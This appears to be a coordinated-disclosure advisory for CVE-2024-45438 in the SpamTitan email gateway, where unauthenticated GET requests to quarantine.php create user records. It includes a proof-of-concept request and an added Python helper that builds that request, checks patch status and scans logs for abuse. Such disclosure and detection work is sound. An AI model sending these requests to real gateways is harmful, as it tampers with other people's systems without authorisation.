Seralys Security Advisory | https://www.seralys.com/research
======================================================================
Title:         Unauthenticated User Creation
Product:       SpamTitan Email Security Gateway
Affected:      Confirmed on 8.00.95
Fixed in:      8.00.101 and 8.01.14
Vendor:        TitanHQ
Discovered:    May 2024
Severity:      HIGH
CWE:           CWE-306: Missing Authentication for Critical Function
CVE:           CVE-2024-45438
CVSS:          8.6 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
Discovered by: Philippe Caturegli (Seralys) & Julian B.
======================================================================

Overview
--------
The `quarantine.php` script in the SpamTitan web interface lets an
unauthenticated client trigger account-level actions with a crafted GET
request. When the `email` parameter names an address that does not yet
exist, SpamTitan silently creates a user record for it and stores
quarantine settings against that record, without any authentication.

An attacker can therefore inject arbitrary records into the user base and
alter internal application behaviour, which may open privilege escalation
paths or leak information in misconfigured environments.

======================================================================

Technical Details
-----------------

Affected Endpoint:
------------------
`quarantine.php`

The following unauthenticated request triggers user creation:

```
/quarantine.php?language=en&role_type=admin&action=setperiod&email=admin@attacker.com&period=WD&secret_id=1
```

Pseudo-code logic of the request handler (simplified from the vendor code):

```
$email = $_GET['email'];
if (!empty($email)) {
    // Second argument omitted, so the helper's default $create = 1 applies.
    $user_id = db_getmaddr_id($email);
}
```

Helper function (simplified behaviour):

```
function db_getmaddr_id($email, $create = 1) {
    $user_id = /* SELECT id FROM maddr WHERE email = $email */;
    if ($user_id === null && $create == 1) {
        // Unknown address: insert it and return the id of the new record.
        /* INSERT INTO maddr (email, domain) VALUES ($email, <domain part of $email>) */
        $user_id = /* id of the inserted row */;
    }
    return $user_id;
}
```

- Because `db_getmaddr_id($email)` is invoked with only one argument, the
  default value `$create = 1` is used, which triggers implicit user
  creation.
- No session or authentication check is performed before the action is
  executed.
- The `role_type` parameter (e.g. `admin`) is accepted from the query
  string but never validated.

======================================================================

Proof of Concept
----------------
Send the following GET request without any authentication:

```
GET /quarantine.php?language=en&role_type=admin&action=setperiod&email=user@attacker.com&period=WD&secret_id=1 HTTP/1.1
Host: spamtitan.local
```

Effect:
- A new user `user@attacker.com` is silently created.
- Its digest preference is set to "weekly" (`period=WD`).
- No authentication or token is required.

======================================================================

Impact
------
- Unauthenticated creation of internal user records
- Manipulation of quarantine report settings for arbitrary email addresses
- Potential for denial of service or persistence via spam report hijacking
- Expanded application attack surface for further exploitation

======================================================================

Vendor Response
---------------
TitanHQ implemented fixes for this vulnerability as part of a coordinated
disclosure. The issue is resolved in the following versions:

- SpamTitan Gateway v.8.00.101
- SpamTitan Gateway v.8.01.14

Note: if a customer has set the token expiration period to 0 (which
disables tokens), it is still possible to add users even on a fixed
version.
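To turn the fixed build numbers and the token-expiration caveat above, together with the proof-of-concept request, into something a defender can run, the following added example (written for this edit, not Seralys or TitanHQ code) does three things: it decides whether a given SpamTitan version string is at or above the fixed build for its branch and folds in the "token expiration 0 still allows user creation" rule; it builds the raw PoC request so the check can be reproduced against a test instance; and it scans web-server access-log lines for `quarantine.php` hits whose `email` parameter belongs to a domain the gateway does not protect, which is the signature of the implicit-create path. Assumptions, all marked in the code: the version strings look like `8.00.95` or `v.8.00.101`; branches other than 8.00 and 8.01 are reported as unknown rather than guessed; the access log is in the usual "combined" format; the managed-domain list comes from the operator; and the sample log lines (IPs, timestamps, the `release` action) are constructed for the demonstration.

```python
"""Exposure and detection helpers for CVE-2024-45438 (SpamTitan quarantine.php).

Added example, not code from Seralys or TitanHQ. The fixed build numbers and the
"token expiration 0 re-opens the hole" rule come from the advisory; the log format,
the managed-domain list and the sample log lines below are constructed assumptions.
"""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Fixed builds named in the advisory, keyed by release branch (major, minor).
FIXED_BUILDS = {(8, 0): (8, 0, 101), (8, 1): (8, 1, 14)}


def parse_version(version: str) -> tuple[int, int, int]:
    """'v.8.00.95' -> (8, 0, 95). Leading zeros in the minor field are not significant."""
    parts = version.strip().lstrip("v.").split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised SpamTitan version string: {version!r}")
    major, minor, build = (int(p) for p in parts)
    return major, minor, build


def is_fixed(version: str):
    """True at or above the fixed build for the branch, False below it, None for
    branches the advisory does not cover (assumption: do not guess about them)."""
    major, minor, build = parse_version(version)
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        return None
    return (major, minor, build) >= fixed


def still_exposed(version: str, token_expiration: int):
    """Combine the build check with the vendor's caveat: a patched gateway whose
    quarantine token expiration is still 0 (tokens disabled) can still add users."""
    fixed = is_fixed(version)
    if fixed is None:
        return None
    return (not fixed) or token_expiration == 0


def build_poc_request(host: str, email: str, period: str = "WD", secret_id: str = "1") -> bytes:
    """Raw HTTP/1.1 request equivalent to the advisory's proof of concept (no auth headers)."""
    query = urlencode(
        {"language": "en", "role_type": "admin", "action": "setperiod",
         "email": email, "period": period, "secret_id": secret_id},
        safe="@",
    )
    return f"GET /quarantine.php?{query} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode()


# Apache/nginx "combined" log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_user_creation_attempts(log_lines, managed_domains):
    """Flag quarantine.php hits whose 'email' parameter belongs to a domain the gateway
    does not protect. A legitimate digest link only ever carries a local mailbox, so a
    foreign address in this parameter points at the implicit-create path."""
    managed = {d.lower() for d in managed_domains}
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/quarantine.php":
            continue
        params = parse_qs(url.query)
        email = params.get("email", [""])[0]
        if "@" not in email:
            continue
        if email.rsplit("@", 1)[1].lower() in managed:
            continue
        findings.append({
            "ip": m.group("ip"),
            "email": email,
            "action": params.get("action", [""])[0],
            "role_type": params.get("role_type", [""])[0],
            "status": m.group("status"),
        })
    return findings


# Constructed sample log lines: one PoC-style hit, one legitimate digest click, one unrelated.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Aug/2025:10:15:02 +0000] "GET /quarantine.php?language=en&role_type=admin&action=setperiod&email=user@attacker.com&period=WD&secret_id=1 HTTP/1.1" 200 1532 "-" "curl/8.6.0"',
    '198.51.100.4 - - [20/Aug/2025:10:16:40 +0000] "GET /quarantine.php?language=en&action=release&email=alice@example.com&secret_id=8841 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [20/Aug/2025:10:17:01 +0000] "GET /login.php HTTP/1.1" 200 901 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(is_fixed("8.00.95"), is_fixed("8.00.101"), still_exposed("8.01.14", 0))
    print(build_poc_request("spamtitan.local", "user@attacker.com").decode())
    for finding in find_user_creation_attempts(SAMPLE_LOG, ["example.com"]):
        print(finding)
```

The log check is deliberately narrow: it keys on the foreign domain in `email`, not on `action=setperiod`, because any action on the endpoint reaches the same `db_getmaddr_id()` default-create path, and it records `role_type` only so an analyst can see the unvalidated `admin` value in the hit. Feed it real log lines (for example `find_user_creation_attempts(open("access.log"), ["yourdomain.example"])`) and pass the request bytes from `build_poc_request()` to a plain TCP client such as `nc` when reproducing against a test instance.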
On fixed versions the quarantine settings page now shows a warning when
this value is 0, and going forward the token expiration period cannot be
set lower than 1.

======================================================================

Timeline
--------
- 2024-05-12: Vulnerability discovered during a pentest
- 2025-04-28: Advisory drafted (we had kind of forgotten about that vuln :))
- 2025-04-28: Initial advisory submitted to TitanHQ
- 2025-05-06: Follow-up #1 from Seralys
- 2025-05-16: Follow-up #2 from Seralys
- 2025-05-19: TitanHQ acknowledged receipt and initiated coordination
- 2025-06-13: TitanHQ publicly released a fix in v8.00.101 and v8.01.14
- 2025-08-20: Public disclosure by Seralys

======================================================================

About Seralys
-------------
Seralys is a boutique penetration testing firm with offices in Europe and
North America. We provide high value-add penetration testing and security
assessments.
https://www.seralys.com

======================================================================

Acknowledgments
---------------
Special shoutout to our fellow researchers at BastardLabs. \m/

======================================================================

Disclaimer
----------
This advisory is provided for coordinated disclosure purposes only.
Reproduction or distribution for malicious use is strictly prohibited.

EOF